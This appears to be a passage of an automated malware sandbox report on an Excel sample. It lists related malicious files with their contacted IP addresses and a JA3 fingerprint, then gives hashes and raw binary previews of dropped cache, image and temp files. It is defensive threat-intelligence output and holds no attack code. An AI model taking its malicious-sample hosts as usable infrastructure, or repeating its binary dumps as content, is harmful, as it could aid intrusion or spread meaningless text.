                                                                              c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                              • 108.179.242.122
                                                                              c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                              • 108.179.242.122
                                                                              6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                              • 162.241.24.47
                                                                              DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                              • 162.241.169.22
                                                                              generated check 662732.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.177.61
                                                                              4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                                              • 162.241.24.47
                                                                              QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                              • 192.185.131.134
                                                                              gunzipped.exeGet hashmaliciousBrowse
                                                                              • 192.254.189.182
                                                                              UNIFIEDLAYER-AS-1USstatistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              INDIA ORDERD CH2323ED.exeGet hashmaliciousBrowse
                                                                              • 162.241.169.22
                                                                              ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                              • 192.254.185.244
                                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              presentation.jarGet hashmaliciousBrowse
                                                                              • 50.87.249.219
                                                                              presentation.jarGet hashmaliciousBrowse
                                                                              • 50.87.249.219
                                                                              GK58.vbsGet hashmaliciousBrowse
                                                                              • 192.185.21.136
                                                                              catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.20.98
                                                                              catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.20.98
                                                                              4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                              • 50.87.166.59
                                                                              c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                              • 108.179.242.122
                                                                              c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                              • 108.179.242.122
                                                                              6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                              • 162.241.24.47
                                                                              DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                              • 162.241.169.22
                                                                              generated check 662732.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.177.61
                                                                              4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                                              • 162.241.24.47
                                                                              QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                              • 192.185.131.134
                                                                              gunzipped.exeGet hashmaliciousBrowse
                                                                              • 192.254.189.182

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              7dcce5b76c8b17472d024758970a406bstatistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              e1df57de_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              MV RED SEA.docxGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              SecuriteInfo.com.Heur.31681.xlsGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              471e3984_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              presupuesto.xlsxGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              ORDER INQUIRY.docGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              Outstanding Payment Plan.xlsGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              SecuriteInfo.com.Heur.3421.xlsGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              diagram-586750002.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              94a5cd81_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              Documents_585904356_2104184844.xlsGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89
                                                                              e9251e1f_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              • 192.254.233.89

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                              Category:dropped
                                                                              Size (bytes):58596
                                                                              Entropy (8bit):7.995478615012125
                                                                              Encrypted:true
                                                                              SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                              MD5:61A03D15CF62612F50B74867090DBE79
                                                                              SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                              SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                              SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):893
                                                                              Entropy (8bit):7.366016576663508
                                                                              Encrypted:false
                                                                              SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                              MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                              SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                              SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                              SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):326
                                                                              Entropy (8bit):3.1292511123011737
                                                                              Encrypted:false
                                                                              SSDEEP:6:kKfwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:XwTJrkPlE99SNxAhUe0ht
                                                                              MD5:432314BED73C655E8168E744F09CB6AC
                                                                              SHA1:ECD983441714B95C79AA273D1A973D6142B179D4
                                                                              SHA-256:F39F34785088B71146AB1949B93D78837A27030E704B2D139C31A9AB17AE7146
                                                                              SHA-512:F790386CE7DB547EE4D283295690E22889A87BB55F1CA2CDA4B8BEB0CBE2E4E4AAF5C54D7607D49AAD0FAF55226B94CE0CEA6DA0E0BD16D9D0C7E0844E9AD61C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: p...... ........C.}.%A..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):252
                                                                              Entropy (8bit):2.9933344443890926
                                                                              Encrypted:false
                                                                              SSDEEP:3:kkFkl61fllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPWlP1:kKoQE1liBAIdQZV7ulPPN
                                                                              MD5:AA4B3B242E4A4F9EAD831A622B116015
                                                                              SHA1:A027FBDB34178DD2367BF73ADBF570E0D2F1CF74
                                                                              SHA-256:1A2CDEB74D901F2DAC5A5C5F53B0C2830E58508279C67C0776B6A043A1415544
                                                                              SHA-512:5051F1CFA67318BCAFCB842FF7942B321895C20251FFFA341C00DF7F4607C221577D92530E0235EF9FFBD8DA0115C372DEDD42D3B1E3007755150DCAAFCFF1EE
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: p...... ....`....|B.%A..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\suspendedpage[1].htm
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:HTML document, ASCII text
                                                                              Category:downloaded
                                                                              Size (bytes):494
                                                                              Entropy (8bit):4.962239405540505
                                                                              Encrypted:false
                                                                              SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                              MD5:0357AA49EA850B11B99D09A2479C321B
                                                                              SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                              SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                              SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              IE Cache URL:https://anaheimdermatologists.com/cgi-sys/suspendedpage.cgi
                                                                              Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E426944.png
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):34787
                                                                              Entropy (8bit):7.9883689087667955
                                                                              Encrypted:false
                                                                              SSDEEP:768:XbyxVN2hP86XpVBxUmtCQHcQpKvtcFM/MoJ97bk3Ueu:m92hjPcQpWUot9Eg
                                                                              MD5:2C5A59B7F30E5E41412EC22FDEA1DBB5
                                                                              SHA1:9A64FB6A68683EEC580A881725DBD146E80D06B1
                                                                              SHA-256:E872E66F60AE5651AE96A2C2A88D07B0D1C96CDDD45F787AB04237891AD4E8FB
                                                                              SHA-512:2D494F44E1DA36794C3E707BF1173EE63E2CF3101E3B5EA60D71A194DA9A6A1EB6B9C166B7C1ACAA2D455B9C6413D0FEE40AD38972C076183EF167818D7E92EC
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+......IDATx^....]U.>..{'.......".bA.6.6..o/3...:......b....{HBBz./........[..%yI.!>...}.^{.o.........^..R.......=..c..-Z.n]cc...W.^...........z..2.9s.<....?|...._j.&.....R.......K...\.V..ukS..sgKKKWWWkk._@s....<x.Q..t..1bt.5k.QG....,X0f..Y.T...............k..y..k..K6^....v.x}..p....vX.MK..5.....j...X....8...~......z.{.aJ.Q...{.._|...|.....{.ui..M.)^...I.....};>..[n...../^..hnn.t.^.}..S.Ly.3.q.W.v.i)d.....W.x=p.".d@k.(.y...kE..P......mH"F^...\q..v)....K...R...:O..i..G......?...!.....y.^..W.....:u...).c.j ..=....X......<..u.]w.7.H.;.GE*...x.;^..WM.8.....G..x.?.Z*....:F..~..k..f.%.kN {..}(.d..C.z...2.G....x...S*.^....<..?..o...ME`......s.9.{.......>;.5....o.T....,..I.....?...o.w..6../~..>.....S.i1.Q.)^..VIe.........~._../..G...!C......|..k]]]v.x..wt......=.Y0...Z.9......=t.....]{S.)^.Mm...p..m......M.6....r.L.6MT..3'M.4{.l~.P[h....Wtttx........#.OR.\.r.e@
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1EA088F.png
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):8301
                                                                              Entropy (8bit):7.970711494690041
                                                                              Encrypted:false
                                                                              SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                              MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                              SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                              SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                              SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                              Malicious:false
                                                                              Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EAA553F2.png
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):848
                                                                              Entropy (8bit):7.595467031611744
                                                                              Encrypted:false
                                                                              SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                              MD5:02DB1068B56D3FD907241C2F3240F849
                                                                              SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                              SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                              SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                              Malicious:false
                                                                              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6F47075.png
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):557
                                                                              Entropy (8bit):7.343009301479381
                                                                              Encrypted:false
                                                                              SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                              MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                              SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                              SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                              SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                              Malicious:false
                                                                              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                              C:\Users\user\AppData\Local\Temp\CabE7FF.tmp
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                              Category:dropped
                                                                              Size (bytes):58596
                                                                              Entropy (8bit):7.995478615012125
                                                                              Encrypted:true
                                                                              SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                              MD5:61A03D15CF62612F50B74867090DBE79
                                                                              SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                              SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                              SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                              Malicious:false
                                                                              Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                              C:\Users\user\AppData\Local\Temp\EDDE0000
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):109076
                                                                              Entropy (8bit):7.916953258661507
                                                                              Encrypted:false
                                                                              SSDEEP:1536:oeuov3BiTr4GDgM+1M92hjPcQpWUot9ENPcNcrAOJOerwzkFBHhr6vQnf+zyyfDe:oeuocrZD2MopH8x+FHdoLqp6vif+zb7e
                                                                              MD5:048F8C82483D1FD10E5E24CC543E6B22
                                                                              SHA1:38CBD864D57048939B41364384E9A142E0821E3F
                                                                              SHA-256:885D44BE1631D584CFFDE9FF5695120101B5E25D92EE690597756ED13BC4E49F
                                                                              SHA-512:DA02BCE68D74515B5CD9069B04512F40B7D0F723F5FD7A0022ED97FB41A4EEFEC2C6C622653AD6A2D2051C0BDBF784A7D801A043113AFA91FBE85875226FF987
                                                                              Malicious:false
                                                                              Preview: .U.n.0....?..........C....I?.&..a..e.....5..Jr........jcM....w-.hf..'..k.....0.....Z..dW......XQ...).....l|.G3+..H..;..\....l..K...T.......&U....)Yj....2U.D.FK.H(.r.......|...`. ....&DM...R....u...f.y.xE...%#2....,.`..~!.^a.3..0.....ZAu'b.......}\/._7.A...k.H0Mq..BF........^..`*........7........E. .V.-f.....2.n:.h.]].a..J.../...c..........-...c.E.u.(...../.....s......>.....> .q...$Y....AL..Yv,)..........a.@....pZ........PK..........!.t...............[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\TarE800.tmp
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):152788
                                                                              Entropy (8bit):6.309740459389463
                                                                              Encrypted:false
                                                                              SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                                              MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                                              SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                                              SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                                              SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                                              Malicious:false
                                                                              Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 19:40:42 2021, atime=Tue May 4 19:40:42 2021, length=8192, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):867
                                                                              Entropy (8bit):4.476231567016527
                                                                              Encrypted:false
                                                                              SSDEEP:12:85QzLgXg/XAlCPCHaX2B8GB/6cPExX+WnicvbbbDtZ3YilMMEpxRljKzTdJP9TdU:85E/XTm6GUcYYejDv3q+rNru/
                                                                              MD5:64C88A672E5E1E0D20838501E7827D02
                                                                              SHA1:841048C304E2AA09B4E53F24D91CDFE5B64AB082
                                                                              SHA-256:8D5B3A14E36DA67C1013B78F96594A08A5437FC2173F1F9D0749D554BA44257C
                                                                              SHA-512:AFF3C910F5AC8EBBF1A196D128D0171875375A9A440CB02696FE42CE1B1DB54DDA6B1B0D9A9C38765345A28D46489F323F28AB529A818BB9B320E193B36C90CB
                                                                              Malicious:false
